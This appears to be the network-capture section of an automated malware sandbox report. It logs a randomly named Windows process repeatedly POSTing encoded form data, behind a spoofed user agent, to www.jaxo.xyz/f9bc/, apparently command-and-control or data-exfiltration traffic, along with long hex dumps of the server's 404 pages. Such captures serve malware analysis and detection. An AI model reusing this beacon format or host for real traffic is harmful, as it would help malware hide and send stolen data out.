                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.64973866.29.149.180806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:03.822593927 CEST742OUTPOST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 51 4b 51 57 34 33 4a 50 6a 74 63 65 6b 54 6c 65 6a 61 56 32 31 61 5a 38 68 46 7a 6f 33 41 73 74 6e 53 76 43 6f 43 32 41 72 79 65 55 45 77 78 70 2f 50 55 75 63 54 45 6c 4e 68 57 62 65 69 77 6c 31 2f 6f 56 79 4c 64 32 4a 35 2b 6e 7a 77 39 36 64 70 50 6e 47 64 76 58 54 36 35 42 51 30 6d 50 50 33 65 38 44 63 79 4b 70 6a 6f 32 44 46 37 79 52 4b 2b 56 48 46 4c 70 41 37 34 61 6d 66 67 59 35 50 34 38 78 42 7a 50 62 63 7a 49 4c 34 58 63 43 7a 74 56 72 57 59 4a 63 33 7a 56 4d 45 4e 4d 69 76 4a 69 54 48 4c 54 59 67 69 76 71 56 61 38 32 32 30 43 72 42 79 65 79 36 77 61 65 5a 2f 72
                      Data Ascii: Xn70_=3QjmXr4dAreEQKQW43JPjtcekTlejaV21aZ8hFzo3AstnSvCoC2AryeUEwxp/PUucTElNhWbeiwl1/oVyLd2J5+nzw96dpPnGdvXT65BQ0mPP3e8DcyKpjo2DF7yRK+VHFLpA74amfgY5P48xBzPbczIL4XcCztVrWYJc3zVMENMivJiTHLTYgivqVa8220CrByey6waeZ/r
                      Aug 23, 2024 08:27:04.427825928 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:04 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                      Aug 23, 2024 08:27:04.427850962 CEST224INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: cente
                      Aug 23, 2024 08:27:04.427855968 CEST1236INData Raw: 72 3b 0a 7d 0a 0a 2e 70 61 74 68 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 33 30 30 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 33 30 30 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 64 61 73 68
                      Data Ascii: r;}.path { stroke-dasharray: 300; stroke-dashoffset: 300; animation: dash 4s alternate infinite;}@keyframes dash{ 0%, 30%{ fill: 4B4B62; stroke-dashoffset: 0; } 80%,100%{ fill: transparent; stroke-dash
                      Aug 23, 2024 08:27:04.427877903 CEST1236INData Raw: 36 2e 37 31 35 2d 32 37 2e 36 38 33 2d 31 30 2e 36 34 35 2d 35 37 2e 38 34 34 20 31 38 2e 33 37 37 2d 38 36 2e 31 35 32 20 39 2e 38 37 33 2d 32 2e 31 30 31 2d 2e 36 33 2d 34 2e 33 31 32 2d 31 2e 36 30 35 2d 35 2e 34 31 38 2d 33 2e 36 34 31 2d 31
                      Data Ascii: 6.715-27.683-10.645-57.844 18.377-86.152 9.873-2.101-.63-4.312-1.605-5.418-3.641-1.08-1.988-.834-4.51-.214-6.716 3.468-12.348 16.939-20.21 17.528-33.102.32-7.008-3.504-13.564-8.325-18.251-33.126-32.2-81.125 6.102-114.9 18.194-55.542 19.884-112
                      Aug 23, 2024 08:27:04.427891970 CEST1236INData Raw: 22 4d 33 34 2e 36 34 38 20 31 36 37 2e 37 35 38 63 2d 38 2e 38 36 33 2d 31 2e 35 32 36 2d 32 33 2e 35 31 35 2d 36 2e 39 33 39 2d 33 30 2e 32 39 32 2d 31 34 2e 32 31 38 2d 36 2e 37 37 35 2d 37 2e 32 38 2d 32 2e 30 39 36 2d 38 2e 38 30 33 20 33 2e
                      Data Ascii: "M34.648 167.758c-8.863-1.526-23.515-6.939-30.292-14.218-6.775-7.28-2.096-8.803 3.508-5.387 5.605 3.415 24.569 11.557 54.124 12.263 29.555.706 61.424-6.946 72.2-17.053 0 0 2.705-1.47 2.768 1.509.062 2.98.428 7.948-2.769 10.507-3.196 2.558-34.8
                      Aug 23, 2024 08:27:04.427903891 CEST672INData Raw: 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 45 41 44 34 22 20 64 3d 22 4d 34 35 2e 35 30 38 20 31 33 2e 31 31 34 63 2d 2e 33 36 38 2e 35 34 39 2d 2e 35 34 20 31
                      Data Ascii: (161 68)"/> <path fill="#FFEAD4" d="M45.508 13.114c-.368.549-.54 1.598-.503 2.445.017.392.297.604.45.287.143-.297.222-.617.303-.978.087-.387.197-.735.238-1.15.042-.44-.257-.95-.488-.604M42.092 9.016c-.694.13-1.446.61-1.774 1.09
                      Aug 23, 2024 08:27:04.427908897 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                      Aug 23, 2024 08:27:04.427912951 CEST224INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                      Aug 23, 2024 08:27:04.427920103 CEST1236INData Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                      Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                      Aug 23, 2024 08:27:04.427926064 CEST224INData Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
                      Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102
                      Aug 23, 2024 08:27:04.432828903 CEST1236INData Raw: 2d 2e 35 34 38 2d 2e 34 35 37 2d 2e 34 37 36 2d 2e 35 34 31 2e 30 35 2d 2e 30 37 33 2e 34 35 33 2d 2e 30 35 37 2e 38 37 37 2e 30 31 20 31 2e 33 33 31 2e 30 38 33 2e 35 34 38 2e 32 38 36 2e 38 37 34 2e 35 31 32 20 31 2e 31 37 2e 31 31 2e 31 34 34
                      Data Ascii: -.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.065-.477.525.046.56.713.047 1.359-.082 2.053-.14.468-.04 1.35.253 1.516-.1


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.64973966.29.149.180806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:06.372579098 CEST766OUTPOST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 49 74 69 48 54 43 36 58 57 41 6f 79 65 55 51 41 77 6a 77 76 56 69 63 54 34 63 4e 6b 75 62 65 6a 51 6c 31 37 73 56 7a 38 78 35 4a 70 2b 66 37 51 39 43 54 4a 50 6e 47 64 76 58 54 35 46 72 51 30 65 50 50 44 69 38 41 2b 57 4c 71 6a 6f 31 41 46 37 79 56 4b 2b 5a 48 46 4c 41 41 34 39 33 6d 64 59 59 35 4b 45 38 78 55 47 5a 56 63 7a 4f 50 34 57 76 53 53 63 4e 68 56 52 75 62 6b 71 7a 56 55 68 66 75 35 49 34 50 30 4c 77 4b 77 43 74 71 58 43 4f 32 57 30 6f 70 42 4b 65 67 74 38 39 52 74 61 49 54 71 77 62 2b 61 77 33 73 35 75 6e 33 78 62 42 39 43 44 63 4b 67 3d 3d
                      Data Ascii: Xn70_=3QjmXr4dAreEWbgW7RBPydcZhTlep6Vy1aV8hAD4wyItiHTC6XWAoyeUQAwjwvVicT4cNkubejQl17sVz8x5Jp+f7Q9CTJPnGdvXT5FrQ0ePPDi8A+WLqjo1AF7yVK+ZHFLAA493mdYY5KE8xUGZVczOP4WvSScNhVRubkqzVUhfu5I4P0LwKwCtqXCO2W0opBKegt89RtaITqwb+aw3s5un3xbB9CDcKg==
                      Aug 23, 2024 08:27:06.956264973 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:27:06 GMT
                      Server: Apache
                      Content-Length: 13840
                      Connection: close
                      Content-Type: text/html
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                      Aug 23, 2024 08:27:06.956290960 CEST1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                      Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                      Aug 23, 2024 08:27:06.956304073 CEST448INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                      Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                      Aug 23, 2024 08:27:06.956317902 CEST1236INData Raw: 34 2d 35 35 2e 35 34 32 20 31 39 2e 38 38 34 2d 31 31 32 2e 31 35 37 20 33 36 2e 34 39 2d 31 36 37 2e 38 34 39 20 35 35 2e 39 36 33 2d 32 30 2e 38 31 20 37 2e 32 37 35 2d 34 34 2e 39 31 20 31 38 2e 36 30 36 2d 34 38 2e 37 36 36 20 34 31 2e 39 32
                      Data Ascii: 4-55.542 19.884-112.157 36.49-167.849 55.963-20.81 7.275-44.91 18.606-48.766 41.922z"/> </defs> <g fill="none" fill-rule="evenodd"> <path fill="#FFF" d="M0 0H1366V800H0z" transform="translate(-448 -157)"/> <g transform=
                      Aug 23, 2024 08:27:06.956330061 CEST224INData Raw: 30 37 2d 33 2e 31 39 36 20 32 2e 35 35 38 2d 33 34 2e 38 30 35 20 32 33 2e 35 32 36 2d 39 39 2e 35 34 20 31 32 2e 33 37 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 36 31 20 36 38 29 22 2f 3e 0a 20 20 20 20 20 20 20
                      Data Ascii: 07-3.196 2.558-34.805 23.526-99.54 12.379" transform="translate(161 68)"/> <path fill="#FFDA7F" d="M5.679 131.837c-6.522 1.646-.275 6.91 9.492 12.14 9.767 5.229 28.24 10.257 44.267 10.015 16.028-.243 37.48-.4
                      Aug 23, 2024 08:27:06.956343889 CEST1236INData Raw: 38 31 20 35 32 2e 35 34 33 2d 35 2e 33 33 33 20 31 35 2e 30 36 2d 34 2e 38 35 32 20 31 36 2e 32 32 33 2d 39 2e 35 35 20 31 37 2e 39 39 38 2d 31 33 2e 32 39 38 20 31 2e 37 37 34 2d 33 2e 37 34 38 2d 31 30 37 2e 33 32 2d 37 2e 38 30 39 2d 31 32 34
                      Data Ascii: 81 52.543-5.333 15.06-4.852 16.223-9.55 17.998-13.298 1.774-3.748-107.32-7.809-124.3-3.524" transform="translate(161 68)"/> </g> <g class="pao-cima"> <path fill="#FBB868" d="M71.37 0C49.008.035-2.4
                      Aug 23, 2024 08:27:06.956355095 CEST224INData Raw: 38 37 2e 30 30 37 20 31 2e 34 38 35 2e 32 35 20 32 2e 30 36 37 2e 31 39 2e 34 35 38 2e 36 39 34 2e 34 37 33 2e 37 33 37 2d 2e 32 35 2e 30 34 33 2d 2e 37 35 39 2d 2e 31 30 39 2d 31 2e 35 39 32 2d 2e 33 37 32 2d 32 2e 31 38 31 4d 33 32 2e 35 35 20
                      Data Ascii: 87.007 1.485.25 2.067.19.458.694.473.737-.25.043-.759-.109-1.592-.372-2.181M32.55 15.101c-1.206.547-1.849 1.662-1.414 2.552.188.384 1.21.504 1.46.077.188-.32.407-.629.616-.942.243-.363.63-.675.767-1.064.173-.486-.753-.93-1.4
                      Aug 23, 2024 08:27:06.957422972 CEST1236INData Raw: 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38 2e 35 33 32 2d 2e 36 32 2e 39 34 32 2d 2e 31 36 36 2e 35 36 35 2d 2e 32 30 35 20 31 2e 30 33 33 2d 2e 31 34 39 20 31 2e 36 37 34 2e 30 35 33 2e
                      Data Ascii: 3-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c-.737-.211-1.406.211-1.881.674-.53.514-.607 1.19
                      Aug 23, 2024 08:27:06.957448959 CEST224INData Raw: 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e 34 32 4d 37 33 2e 39 35 36 20 31 30 2e 36 32 36 63 2d 2e 32 33 31 2d 2e 38 33 36 2d 2e 37 33 35 2d 31 2e 32 35 35 2d 31 2e 33 31 36 2d 31 2e 35
                      Data Ascii: 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.067.22.24.333.325.168.128.336.
                      Aug 23, 2024 08:27:06.957494974 CEST1236INData Raw: 32 34 37 2e 35 30 38 2e 33 36 34 2e 33 32 37 2e 32 31 39 2e 35 36 34 2e 36 30 39 2e 38 37 33 2e 38 36 38 2e 35 33 37 2e 34 35 20 31 2e 32 37 2d 2e 34 32 20 31 2e 30 34 2d 31 2e 32 35 31 4d 36 36 2e 35 34 39 20 31 35 2e 30 31 37 63 2d 2e 38 33 2d
                      Data Ascii: 247.508.364.327.219.564.609.873.868.537.45 1.27-.42 1.04-1.251M66.549 15.017c-.83-.233-.486 2.056-.435 2.528.055.51.678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052
                      Aug 23, 2024 08:27:06.965178013 CEST1236INData Raw: 31 2e 30 33 33 2e 37 32 34 2d 2e 33 35 36 2e 33 38 38 2e 30 37 20 31 2e 31 34 33 2e 35 34 2e 39 33 6c 2d 2e 30 36 35 2d 2e 30 38 33 63 2e 30 39 35 2e 30 35 2e 31 39 32 2e 30 38 2e 32 39 35 2e 30 39 2e 31 37 37 2e 30 33 32 2e 33 31 2e 30 37 34 2e
                      Data Ascii: 1.033.724-.356.388.07 1.143.54.93l-.065-.083c.095.05.192.08.295.09.177.032.31.074.477.16.373.189.702.503 1.023.78.348.301 1.738.788 1.586-.245-.141-.963-.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.54


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.64974066.29.149.180806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:27:08.922291040 CEST1779OUTPOST /f9bc/ HTTP/1.1
                      Host: www.jaxo.xyz
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.jaxo.xyz
                      Referer: http://www.jaxo.xyz/f9bc/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 33 51 6a 6d 58 72 34 64 41 72 65 45 57 62 67 57 37 52 42 50 79 64 63 5a 68 54 6c 65 70 36 56 79 31 61 56 38 68 41 44 34 77 79 41 74 2b 6c 72 43 6f 68 65 41 70 79 65 55 54 41 77 67 77 76 55 34 63 54 52 55 4e 6b 72 73 65 6e 67 6c 33 59 30 56 30 4a 46 35 61 4a 2b 66 33 77 39 35 64 70 50 2b 47 64 2f 54 54 36 74 72 51 30 65 50 50 46 47 38 55 38 79 4c 6d 44 6f 32 44 46 37 32 52 4b 2f 45 48 46 44 78 41 37 51 4b 6d 74 34 59 35 75 59 38 39 43 71 5a 5a 63 7a 4d 42 59 57 33 53 53 51 73 68 56 39 49 62 6e 33 59 56 58 39 66 71 76 78 2b 51 46 33 52 58 42 2b 63 70 58 79 71 31 67 70 61 6d 6a 57 5a 6d 65 55 67 52 38 65 61 55 76 67 76 2b 63 4a 47 6b 4b 65 53 70 30 54 65 2f 42 79 59 58 4a 7a 57 77 79 68 56 67 2b 55 63 42 4a 35 75 69 35 38 64 78 6e 70 53 66 63 64 68 50 72 70 61 42 43 54 6a 46 43 39 6e 48 45 62 47 6d 47 67 79 4c 45 34 43 7a 49 4a 4b 49 4d 79 74 38 6d 79 38 69 54 6e 7a 39 70 70 52 63 68 77 31 71 61 7a 67 68 79 66 4a 79 55 41 6f 53 71 46 78 4d 78 38 6e 37 49 46 4e 34 72 76 4a 74 4e 5a 64 [TRUNCATED]
